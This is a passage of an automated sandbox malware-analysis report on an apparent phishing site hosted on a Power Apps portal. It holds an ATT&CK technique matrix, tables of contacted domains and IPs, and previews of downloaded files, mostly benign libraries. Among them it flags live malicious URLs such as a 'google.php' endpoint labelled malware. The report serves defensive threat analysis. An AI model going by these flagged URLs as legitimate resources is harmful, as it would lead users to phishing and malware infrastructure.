      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Extra Window Memory Injection
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://site-xtxg5.powerappsportals.com/0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://content.powerapps.com/resource/powerappsportal/dist/postpreform.BootstrapV5.bundle-11a5a91493.js0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/bootstrap.BootstrapV5.bundle-be8391e97d.js0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/app.BootstrapV5.bundle-612df4da3a.js0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/img/close.png0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/pcf.bundle-582a4e04bd.js0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/fonts/fa-solid-900.woff20%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/client-telemetry-wrapper.bundle-633e70f51b.js0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/pcf-style.bundle-373a0f4982.css0%Avira URL Cloudsafe
      https://site-xtxg5.powerappsportals.com/theme.css0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/preform.BootstrapV5.moment_2_29_4.bundle-cf8e0fd942.js0%Avira URL Cloudsafe
      https://site-xtxg5.powerappsportals.com/portalbasictheme.css0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/preform.BootstrapV5.bundle-50672aa3f3.css0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/pcf-dependency.bundle-805a1661b7.js0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/img/web.png0%Avira URL Cloudsafe
      https://site-xtxg5.powerappsportals.com/bootstrap.min.css0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/client-telemetry.bundle-f9f45b65a6.js0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/font-awesome.BootstrapV5.bundle-2ce6efb497.css0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/pcf-loader.bundle-f4a0e619b8.js0%Avira URL Cloudsafe
      https://site-xtxg5.powerappsportals.com/_portal/d2c9c1cb-e35c-462e-996b-95a0b142a77b/Resources/ResourceManager?lang=en-US0%Avira URL Cloudsafe
      https://content.powerapps.com/resource/powerappsportal/dist/pcf-extended.bundle-b0e01b5622.js0%Avira URL Cloudsafe
      https://s.lunaweb.cloud/api/event0%Avira URL Cloudsafe
      https://s.lunaweb.cloud/js/script.manual.outbound-links.tagged-events.js0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/turnstile/v0/api.js0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/xj99j/0x4AAAAAAA_VMp1Xe4VpAjMq/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/91ed34197bf04c24/1741718675466/33670cd6777d70553e154da7844cb15bf1c4001679e0d164563ee0b0f83ab9ab/C3uF7IdsU1RK7Qj0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/91ed34197bf04c24/1741718675462/fegFnYsJtl9wN8o0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/191728647:1741717137:7lLq_BD-QmjVGuY008eq899TlErzNbNFPfyujc2wyPM/91ed34197bf04c24/YK5bWdVcUdmtnYTPkpgjd1tV4jPgoLw8Z2AZJuMny_E-1741718670-1.1.1.1-X9oIxqfQmwq2VLgNfu0DvnnKKUi30IhilZPl11qMY755gRBUyY4Gkpg59K3PSmiV0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91ed34197bf04c24&lang=auto0%Avira URL Cloudsafe
      https://6068815810.sbs/google.php100%Avira URL Cloudmalware
      https://a.nel.cloudflare.com/report/v4?s=ebhIdDW%2Bjy%2B9WO9ribeuFGsIKCHzJmm3ZXrsTvRA%2BTBB%2FYEjuS5nIAsPKheQ4CuFdoI6604gJuGn2DWIJBwrCoUvyCuYexFfb0MGzrKyC7Ub7f1KvkjrfE798NHYYgXckCDLyiTEO3FiLEX7E6DbUTE%3D0%Avira URL Cloudsafe
      https://6068815810-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      jsdelivr.map.fastly.net
      151.101.1.229
      truefalse
        high
        stackpath.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            e329293.dscd.akamaiedge.net
            95.101.182.65
            truefalse
              high
              docdro.id
              54.37.79.95
              truefalse
                unknown
                maxcdn.bootstrapcdn.com
                104.18.10.207
                truefalse
                  high
                  cos.ap-bangkok.myqcloud.com
                  43.128.193.190
                  truefalse
                    high
                    analytics.lunaweb.cloud
                    141.95.74.118
                    truefalse
                      unknown
                      s-part-0039.t-0009.t-msedge.net
                      13.107.246.67
                      truefalse
                        high
                        www.docdroid.com
                        54.37.79.95
                        truefalse
                          high
                          qbauyd.celestialjourney.it.com
                          104.21.86.219
                          truetrue
                            unknown
                            code.jquery.com
                            151.101.2.137
                            truefalse
                              high
                              cdnjs.cloudflare.com
                              104.17.24.14
                              truefalse
                                high
                                challenges.cloudflare.com
                                104.18.94.41
                                truefalse
                                  high
                                  www.google.com
                                  172.217.18.4
                                  truefalse
                                    high
                                    waws-prod-bn1-197-6e2d.eastus2.cloudapp.azure.com
                                    20.119.128.11
                                    truefalse
                                      unknown
                                      6068815810.sbs
                                      69.49.246.64
                                      truefalse
                                        unknown
                                        s-part-0048.t-0009.t-msedge.net
                                        13.107.246.76
                                        truefalse
                                          high
                                          s-part-0032.t-0009.t-msedge.net
                                          13.107.246.60
                                          truefalse
                                            high
                                            cdn.jsdelivr.net
                                            unknown
                                            unknownfalse
                                              high
                                              site-xtxg5.powerappsportals.com
                                              unknown
                                              unknownfalse
                                                unknown
                                                aadcdn.msftauth.net
                                                unknown
                                                unknownfalse
                                                  high
                                                  s.lunaweb.cloud
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    content.powerapps.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      6068815810-1317754460.cos.ap-bangkok.myqcloud.com
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://content.powerapps.com/resource/powerappsportal/img/close.pngfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://content.powerapps.com/resource/powerappsportal/dist/bootstrap.BootstrapV5.bundle-be8391e97d.jsfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/91ed34197bf04c24/1741718675466/33670cd6777d70553e154da7844cb15bf1c4001679e0d164563ee0b0f83ab9ab/C3uF7IdsU1RK7Qjfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://content.powerapps.com/resource/powerappsportal/dist/pwa-style.bundle-2739c60227.cssfalse
                                                          high
                                                          https://content.powerapps.com/resource/powerappsportal/dist/app.BootstrapV5.bundle-612df4da3a.jsfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://6068815810-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.jsfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                            high
                                                            https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://site-xtxg5.powerappsportals.com/theme.cssfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://content.powerapps.com/resource/powerappsportal/fonts/fa-solid-900.woff2false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://content.powerapps.com/resource/powerappsportal/dist/pcf-style.bundle-373a0f4982.cssfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://content.powerapps.com/resource/powerappsportal/dist/pcf-dependency.bundle-805a1661b7.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://qbauyd.celestialjourney.it.com/ztNrN/true
                                                              unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/91ed34197bf04c24/1741718675462/fegFnYsJtl9wN8ofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://a.nel.cloudflare.com/report/v4?s=ebhIdDW%2Bjy%2B9WO9ribeuFGsIKCHzJmm3ZXrsTvRA%2BTBB%2FYEjuS5nIAsPKheQ4CuFdoI6604gJuGn2DWIJBwrCoUvyCuYexFfb0MGzrKyC7Ub7f1KvkjrfE798NHYYgXckCDLyiTEO3FiLEX7E6DbUTE%3Dfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://content.powerapps.com/resource/powerappsportal/dist/client-telemetry.bundle-f9f45b65a6.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.pngfalse
                                                                high
                                                                https://content.powerapps.com/resource/powerappsportal/dist/pcf-loader.bundle-f4a0e619b8.jsfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://content.powerapps.com/resource/powerappsportal/dist/pcf-extended.bundle-b0e01b5622.jsfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                  high
                                                                  https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdffalse
                                                                    unknown
                                                                    https://content.powerapps.com/resource/powerappsportal/dist/postpreform.BootstrapV5.bundle-11a5a91493.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://content.powerapps.com/resource/powerappsportal/dist/pcf.bundle-582a4e04bd.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                                      high
                                                                      https://site-xtxg5.powerappsportals.com/false
                                                                        unknown
                                                                        https://content.powerapps.com/resource/powerappsportal/dist/preform.BootstrapV5.moment_2_29_4.bundle-cf8e0fd942.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/xj99j/0x4AAAAAAA_VMp1Xe4VpAjMq/auto/fbE/new/normal/auto/false
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                                          high
                                                                          https://content.powerapps.com/resource/powerappsportal/dist/client-telemetry-wrapper.bundle-633e70f51b.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://site-xtxg5.powerappsportals.com/bootstrap.min.cssfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://content.powerapps.com/resource/powerappsportal/dist/preform.BootstrapV5.bundle-50672aa3f3.cssfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/191728647:1741717137:7lLq_BD-QmjVGuY008eq899TlErzNbNFPfyujc2wyPM/91ed34197bf04c24/YK5bWdVcUdmtnYTPkpgjd1tV4jPgoLw8Z2AZJuMny_E-1741718670-1.1.1.1-X9oIxqfQmwq2VLgNfu0DvnnKKUi30IhilZPl11qMY755gRBUyY4Gkpg59K3PSmiVfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://site-xtxg5.powerappsportals.com/portalbasictheme.cssfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://s.lunaweb.cloud/js/script.manual.outbound-links.tagged-events.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://content.powerapps.com/resource/powerappsportal/img/web.pngfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91ed34197bf04c24&lang=autofalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://6068815810.sbs/google.phptrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://content.powerapps.com/resource/powerappsportal/dist/font-awesome.BootstrapV5.bundle-2ce6efb497.cssfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://s.lunaweb.cloud/api/eventfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://site-xtxg5.powerappsportals.com/_portal/d2c9c1cb-e35c-462e-996b-95a0b142a77b/Resources/ResourceManager?lang=en-USfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.186.68
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          95.101.182.65
                                                                          e329293.dscd.akamaiedge.netEuropean Union
                                                                          20940AKAMAI-ASN1EUfalse
                                                                          104.18.10.207
                                                                          stackpath.bootstrapcdn.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          13.107.246.67
                                                                          s-part-0039.t-0009.t-msedge.netUnited States
                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          104.18.94.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          13.107.246.60
                                                                          s-part-0032.t-0009.t-msedge.netUnited States
                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          54.37.79.95
                                                                          docdro.idFrance
                                                                          16276OVHFRfalse
                                                                          20.189.173.17
                                                                          unknownUnited States
                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          69.49.246.64
                                                                          6068815810.sbsUnited States
                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                          142.250.185.163
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.186.131
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.184.227
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.184.206
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          92.123.12.181
                                                                          unknownEuropean Union
                                                                          16625AKAMAI-ASUSfalse
                                                                          142.250.186.138
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          13.107.246.76
                                                                          s-part-0048.t-0009.t-msedge.netUnited States
                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          151.101.1.229
                                                                          jsdelivr.map.fastly.netUnited States
                                                                          54113FASTLYUSfalse
                                                                          104.17.24.14
                                                                          cdnjs.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          172.217.16.202
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          74.125.133.84
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          43.128.193.190
                                                                          cos.ap-bangkok.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                          172.217.18.4
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          151.101.65.229
                                                                          unknownUnited States
                                                                          54113FASTLYUSfalse
                                                                          104.18.95.41
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          151.101.2.137
                                                                          code.jquery.comUnited States
                                                                          54113FASTLYUSfalse
                                                                          141.95.74.118
                                                                          analytics.lunaweb.cloudGermany
                                                                          680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                                          20.189.173.27
                                                                          unknownUnited States
                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          142.250.186.142
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.184.238
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          20.119.128.11
                                                                          waws-prod-bn1-197-6e2d.eastus2.cloudapp.azure.comUnited States
                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          104.21.86.219
                                                                          qbauyd.celestialjourney.it.comUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          IP
                                                                          192.168.2.16
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1635569
                                                                          Start date and time:2025-03-11 19:43:08 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                          Sample URL:https://site-xtxg5.powerappsportals.com/
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:16
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • EGA enabled
                                                                          Analysis Mode:stream
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal64.phis.win@27/55@52/235
                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 142.250.184.206, 142.250.184.227, 74.125.133.84, 142.250.186.142, 216.58.206.78
                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://site-xtxg5.powerappsportals.com/
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (2917), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):2917
                                                                          Entropy (8bit):5.1969197317719535
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:047564F733C977004655545FE3FD10CD
                                                                          SHA1:1E3A1159DBEB7381068096899B9B6B28CC153611
                                                                          SHA-256:90A7F10E4DDFE8EBBB63DA29348F46F5CC75449574CCBD530DFC3C4426F96547
                                                                          SHA-512:F6E774B6B507E9911AF8827D5FE13B9F84C4D8FFB0F2405EB439E5713815FF175F6B716213AE16F9D0818D137BEF6C8235FAAB7D84A2880F15704DADEC1A7C34
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://s.lunaweb.cloud/js/script.manual.outbound-links.tagged-events.js
                                                                          Preview:!function(){"use strict";var a=window.location,i=window.document,o=i.currentScript,l=o.getAttribute("data-api")||new URL(o.src).origin+"/api/event";function u(e,t){e&&console.warn("Ignoring Event: "+e),t&&t.callback&&t.callback()}function e(e,t){if(/^localhost$|^127(\.[0-9]+){0,2}\.[0-9]+$|^\[::1?\]$/.test(a.hostname)||"file:"===a.protocol)return u("localhost",t);if((window._phantom||window.__nightmare||window.navigator.webdriver||window.Cypress)&&!window.__plausible)return u(null,t);try{if("true"===window.localStorage.plausible_ignore)return u("localStorage flag",t)}catch(e){}var n={},r=(n.n=e,n.u=t&&t.u?t.u:a.href,n.d=o.getAttribute("data-domain"),n.r=i.referrer||null,t&&t.meta&&(n.m=JSON.stringify(t.meta)),t&&t.props&&(n.p=t.props),new XMLHttpRequest);r.open("POST",l,!0),r.setRequestHeader("Content-Type","text/plain"),r.send(JSON.stringify(n)),r.onreadystatechange=function(){4===r.readyState&&t&&t.callback&&t.callback({status:r.status})}}var t=window.plausible&&window.plausible.q||[
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16756, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):16756
                                                                          Entropy (8bit):7.9855903695422095
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:603C99275486A11982874425A0BC0DD1
                                                                          SHA1:FFEB62D105D2893D323574407B459FBAE8CC90A6
                                                                          SHA-256:4FFC35AC4D5E3F1546A4C1A879F425F090FF3336E0FCE31A39AE4973B5E8C127
                                                                          SHA-512:662DC53798CCDA65EE972A1BB52959CA5F4C45066C1D500C2476C50EC537CB90A42D474D7DDE2BEC1EA8C312CC4A46E1D91FFB610130C2DC7914B65AEF8A2615
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/fonts/open-sans-v34-latin-600.woff2?7ef3bbc98d285227e83a644f04ef14a7
                                                                          Preview:wOF2......At......{...A..........................b. ..P.`?STATZ.....|........t..m.....6.$..8. ..&. .....k....n...Z...a. D..o..6...........3.... Xv]..D..4..7.63..( .qa3m...].1...q.n.0...kM.Q!*D.P.....P.7..%...X..~d....v^on....l&..q.E..~.ba1pj.uy....K.....O...;.[u.L..r4TGh......B&....ad...k.v.h..+.RV.F-..........?*.RXD.R,.k..h.,.f.....s....(..RR....`..(..v..Ng...E{].W.o.....`....f6J....~.}..Q$.G....{m..K.{`...*....=@........{..8.r.|.{CS.{..........;C=....*3.U. vhIS..C.<...d.r...Ko.....E...63i...!@.O.........@G..5.lg.vA${.........(.]..1.X4...s,....7.5~...|.....yv..F....s.EX.V .@...`..R6mi.7../..6..7..|M.-.3s..4.^..M..Jr.....h.............E]..U]U.Uj.^u.4+.....0c.~.j.@......$/...Y...1....Q|A..@........C]...%..i.......&..}!.E..i.O...v&.0<.1L.8.l..2.-I.s.UT.K.uO...:..0..a..<...al...b.n..B.1..`....-.)..+.>.........nT....m"..v..59'.=1......~.`2........Q`.(.1$..]=~K{U.."G.....Q..... e.-.+........cD+...~F.LA..ON..(.p8. .^.C.....N*NL........`U.;x.Y...6T..!1
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 354 x 120, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):7537
                                                                          Entropy (8bit):7.941253226245438
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:C54FE2C440B992862E3A992A529BA797
                                                                          SHA1:D98AFDAFED26EBB4A9C5681B0DA57AC0182B2543
                                                                          SHA-256:4A48D0C8D386210D9853BDC520659D5F36EB635A9207B49A06CBA46B2253ED9E
                                                                          SHA-512:9AC69AD448D35A533908D8887A955A08F6E03957E8B1B1AA3F292F9902B59B4805B26BD7D93083AD73E273B0FD3A6CD44F17F258026E39655C4CCDD65AED1CC2
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/images/logo_navbar_dark.png
                                                                          Preview:.PNG........IHDR...b...x......f.3....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]Ao$.u.j..6...:...DCI..8.w....8..a..../../X........._........#.....%.Xm8...........R..j.....z.j..|..;.....^.z..%..c..?....?..h.....C.|...tH....13.6.q..OYu<.{.X....1...2w8DBF ..{..c...5.@ ..t..,..'$...A.~C~<.._.G..~q.&.t....@ ..n..@.=.G.........`...@ .@.y.q..h.v...[.C2F ......D...9{.D..7.@ ..^t....t..Bw+t..~....;....uiv...o\..............+F ......\[#.....>?..I.....y.=O...F.!.^._1...;.O..=..9.7.!...$L..#q.Hc2..i....@ ..D.....r...$L.... ....h...GS6..qi.....u...A...d...:.}Q..r"F....@".@.{.c7....w.s_..d.!.....D .H..$,....S..i.2...-$t..8..@..+s|.n.4;!..?.PH.[$Q]..xp...H.,..B..K..u...........}...8.K+.A..8..G...2...>.q'...@"....}G!.m...B^z.%..+.. ..p.D..I..@ ...^.k..a.%.B.g....q#...O.._|1.y.......v.!.....%8...6-.k...{.|..g..*'...6..q..R.<4.~x....Z$b.........\.a....@\4.5....5....D<%..E._.1A;a...D....'|F..?G.}p...@\T.N...?.....?.......?..'....@\h..-C...yt ...eA.U.@ .H.....D.@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (64632), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):117011
                                                                          Entropy (8bit):5.053400260730927
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:50672AA3F34B2CC04C2D63924B4CB48B
                                                                          SHA1:F9A230BF95D387875CB9278628F9184829FEC05A
                                                                          SHA-256:8CB90DD74E5F87621FEE57C1B0A9707E4C0EB10DDA705644D0FAA97E47B3CD66
                                                                          SHA-512:629386112CF00BCDBA49AAAF2945535BA08E8293847EE77638676F491035030400AB55D61470FF0A258B44ECF4B3751C024F026BC13AA7977D6B25D89D751B8C
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/preform.BootstrapV5.bundle-50672aa3f3.css
                                                                          Preview:.prettyprint{padding:8px;background-color:#f7f7f9;border:1px solid #e1e1e8}.prettyprint[class*=linenums]{-webkit-box-shadow:inset 40px 0 0 #fbfbfc,inset 41px 0 0 #ececf0;-moz-box-shadow:inset 40px 0 0 #fbfbfc,inset 41px 0 0 #ececf0;box-shadow:inset 40px 0 0 #fbfbfc,inset 41px 0 0 #ececf0}.prettyprint .com{color:#93a1a1}.prettyprint .lit{color:#195f91}.prettyprint .clo,.prettyprint .opn,.prettyprint .pun{color:#93a1a1}.prettyprint .fun{color:#dc322f}.prettyprint .atv,.prettyprint .str{color:#d14}.prettyprint .kwd,.prettyprint .tag{color:#1e347b}.prettyprint .atn,.prettyprint .dec,.prettyprint .typ,.prettyprint .var{color:teal}.prettyprint .pln{color:#48484c}ol.linenums{margin:0 0 0 33px}ol.linenums li{padding-left:12px;color:#bebec5;line-height:18px;text-shadow:0 1px 0 #fff}/*!.. * Datetimepicker for Bootstrap 3.. * version : 4.17.47.. * https://github.com/Eonasdan/bootstrap-datetimepicker/.. */.bootstrap-datetimepicker-widget{list-style:none}.bootstrap-datetimepicker-widget.dropdown-me
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 22 x 97, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.068159130770307
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:450FA7B7D85BC8F76AE689B382F147EC
                                                                          SHA1:4C004E4F142286F846E7870EE17E218C7DB2B089
                                                                          SHA-256:3A7DDA3ACA458009064A4186019EBE2EB27789DAB211B29BDA9EB615BAED8F3A
                                                                          SHA-512:FBB54D947799AAE6D4EC763D080FD854217C9704FA5EFC5767C599CC1C231698F9A0CE2E058BC087EBC94F32AD3DA325C6325C1826F3EC66A4213394D8D893BE
                                                                          Malicious:false
                                                                          Reputation:unknown
